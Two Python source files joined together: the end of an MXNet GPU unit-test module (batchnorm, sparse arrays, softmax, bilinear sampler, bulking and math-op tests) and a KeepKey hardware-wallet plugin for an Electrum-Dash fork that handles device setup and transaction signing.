g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y, gpu_y, atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad, gpu_a.grad, atol = 1e-3, rtol = 1e-3)
@with_seed()
def test_bilinear_sampler_versions():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym1 = mx.sym.BilinearSampler(data=data, grid=grid)
sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True)
sym3 = mx.sym.BilinearSampler(data=data, grid=grid)
test_cases = [[(1,3,15,16),(1,2,10,10)],
[(1,6,7,16),(1,2,10,4)],
[(1,7,3,16),(1,2,8,11)],
[(1,9,50,50),(1,2,50,50)]]
for item in test_cases:
data_shape, grid_shape = item
# kWriteTo
exe_cpu = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write')
exe_gpu = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_cudnn = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_list = [exe_cpu, exe_gpu, exe_cudnn]
ref_idx = 0
test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32)
test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
mx.test_utils.assert_almost_equal(exe_list[ref_idx].outputs[0], exe.outputs[0], rtol=1e-3, atol=1e-5)
out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32)
for exe in exe_list:
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy()
grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy()
# kAddTo
exe_cpu_addto = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add')
exe_gpu_addto = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_cudnn_addto = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto]
data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32)
grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.grad_dict['data'][:] = data_initial_grad
exe.grad_dict['grid'][:] = grid_initial_grad
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['data'], data_grad + data_initial_grad, rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['grid'], grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5)
for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]:
# Mixture of kWriteTo and kNullOp
exe_cpu_mix = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict)
exe_gpu_mix = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_cudnn_mix = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix]
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
                if req_dict['data'] == 'write':
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
                if req_dict['grid'] == 'write':
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
# isolated execution bulking test function to be invoked with different env var settings
def _test_bulking_in_process(seed, time_per_iteration):
data_shape = (10,)
num_ops = 1000
num_iterations = 20
ctx = default_context()
# build symbol
X = mx.sym.Variable('X')
sym = mx.sym.flip(X, axis=0)
for _ in range(num_ops-1):
sym = mx.sym.flip(sym, axis=0)
x = mx.ndarray.zeros(data_shape)
dx = mx.ndarray.zeros(data_shape)
dy = mx.ndarray.ones(data_shape)
exe = sym.bind(ctx=ctx, args=[x], args_grad = {'X':dx})
# time a number of forward() and backward() executions after some warm-up iterations
warmups = 1
for i in range(num_iterations+warmups):
if i == warmups:
start = time.time()
exe.forward(is_train=True)
exe.backward(dy)
dx.wait_to_read()
time_per_iteration.value = (time.time() - start) / num_iterations
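# Context for the bulking tests below (summarized, not authoritative): operator "bulking"
# groups consecutive ops into larger engine segments so fewer synchronizations are issued;
# the MXNET_EXEC_BULK_EXEC_* variables cap the forward/backward segment sizes, which is why
# larger caps are expected to run faster.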
@with_seed()
@unittest.skip('skipping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/16517')
def test_bulking_operator_gpu():
_test_bulking(_test_bulking_in_process)
@unittest.skip('skipping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970')
def test_bulking():
# test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training)
test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)]
times = {}
times_str = ''
for seg_sizes in test_cases:
# Create shared variable to return measured time from test process
time_per_iteration = mp.Manager().Value('d', 0.0)
if not run_in_spawned_process(_test_bulking_in_process,
{'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : str(seg_sizes[0]),
'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : str(seg_sizes[1]),
'MXNET_EXEC_BULK_EXEC_TRAIN' : str(seg_sizes[2])},
time_per_iteration):
            # Skip the test since this Python version can't run it properly; a warning was already logged.
return
times[seg_sizes] = time_per_iteration.value
times_str += \
'\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format(
seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes])
fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)])
slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)])
fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)])
fully_bulked_time = times[(15,15,True)]
print(times_str)
    # Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same,
    # and all of them slower than both half-bulked times[0,15,True] and times[15,0,True].
assert slowest_half_bulked_time < fastest_non_bulked_time, \
'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \
.format(slowest_half_bulked_time - fastest_non_bulked_time, times_str)
# The fully bulked times[15,15,True] should be faster than both half-bulked runs
assert fully_bulked_time < fastest_half_bulked_time, \
'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \
.format(fully_bulked_time - fastest_half_bulked_time, times_str)
@with_seed()
def test_allclose_function_gpu():
allclose_function([mx.cpu(), mx.gpu(0)])
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
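# The math_* helpers below run an op on the default context and, when check_value is set,
# compare the result against the same op evaluated explicitly on the CPU.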
def math_log(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.log(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.log(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_erf(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.erf(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.erf(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_square(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.square(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.square(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def run_math(op, shape, dtype="float32", check_value=True):
run_num = 10
for i in range(run_num):
if op == 'log':
math_log(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'erf':
math_erf(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'square':
math_square(shape=shape, dtype=dtype, check_value=check_value)
@with_seed()
def test_math():
ops = ['log', 'erf', 'square']
check_value= True
shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]]
dtypes = ["float32", "float64"]
for shape in shape_lst:
for dtype in dtypes:
for op in ops:
run_math(op, shape, dtype, check_value=check_value)
@with_seed()
def test_arange_like_dtype():
dtypes = [np.float16, np.float32, np.float64]
for t in dtypes:
x = mx.sym.Variable('x', dtype=t)
y = mx.sym.reshape(x, shape=(0, 0, -1))
z = mx.sym.contrib.arange_like(y, axis=-1)
mod = z.simple_bind(ctx=mx.gpu(0), x=(3, 4, 5, 6), grad_req='null')
mod.arg_arrays[0][:] = np.random.normal(size=mod.arg_arrays[0].shape).astype(t)
out = mod.forward(is_train=False)
for v in out:
assert v.dtype == t
def test_fp16_spmm():
inp = mxsps.csr_matrix(sps.coo_matrix(([2.0], ([150], [100000]))).tocsr())
inp = inp.astype('float16', copy=False)
weight = mx.nd.random.randn(100001, 151)
weight = weight.astype('float16', copy=False)
out = mxsps.dot(inp, weight)
out_np = mx.nd.dot(inp, weight)
assert_almost_equal(out.asnumpy(), out_np, rtol=1e-3, atol=1e-5)
if __name__ == '__main__':
import nose
nose.runmodule()
keepkey.py
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_dash.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_dash.bip32 import BIP32Node
from electrum_dash import constants
from electrum_dash.dash_tx import to_varbytes, serialize_extra_payload
from electrum_dash.i18n import _
from electrum_dash.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_dash.keystore import Hardware_KeyStore
from electrum_dash.plugin import Device, runs_in_hwd_thread
from electrum_dash.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
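        # `sequence` is the (change_branch, address_index) pair appended to the
        # keystore's derivation prefix, e.g. a prefix of m/44'/5'/0' plus "/0/3".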
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None:
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
@runs_in_hwd_thread
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
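        # Build a stable identifier from the USB bus number and port path, e.g. "003:1:2".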
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
@runs_in_hwd_thread
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
@runs_in_hwd_thread
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
@runs_in_hwd_thread
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def create_client(self, device, handler):
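        # device.product_key is a (vendor_id, product_id) tuple; a product id of 2
        # selects the WebUSB transport, anything else falls back to HID.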
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
        # Returns the client for a given keystore; the device can be matched via its xpub.
if client:
client.used()
return client
def get_coin_name(self):
return "Xazab Testnet" if constants.net.TESTNET else "Xazab"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
            # Must be short as Qt doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.daemon = True  # setDaemon() is deprecated in favour of the daemon attribute
t.start()
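            # Block the wizard's event loop until _initialize_device_safe exits it;
            # a non-zero exit code means cancellation or failure.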
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
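        # Convert an xpub into the protobuf HDNodeType expected by the firmware,
        # paired with the remaining derivation suffix (address_n).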
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh',):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh',):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
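        # Append the SIGHASH_ALL byte (0x01) to each DER-encoded signature.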
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
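                # Coinbase inputs spend the null outpoint: all-zero txid and index 0xffffffff.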
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not txout.is_ps_ks and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
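        # Dash DIP2 special transactions carry an extra payload and encode the
        # transaction type in the upper 16 bits of the 32-bit version field.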
if t.version > 2:
tx_type = tx.tx_type
if tx_type:
t.extra_data = to_varbytes(serialize_extra_payload(tx))
t.version |= tx_type << 16
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)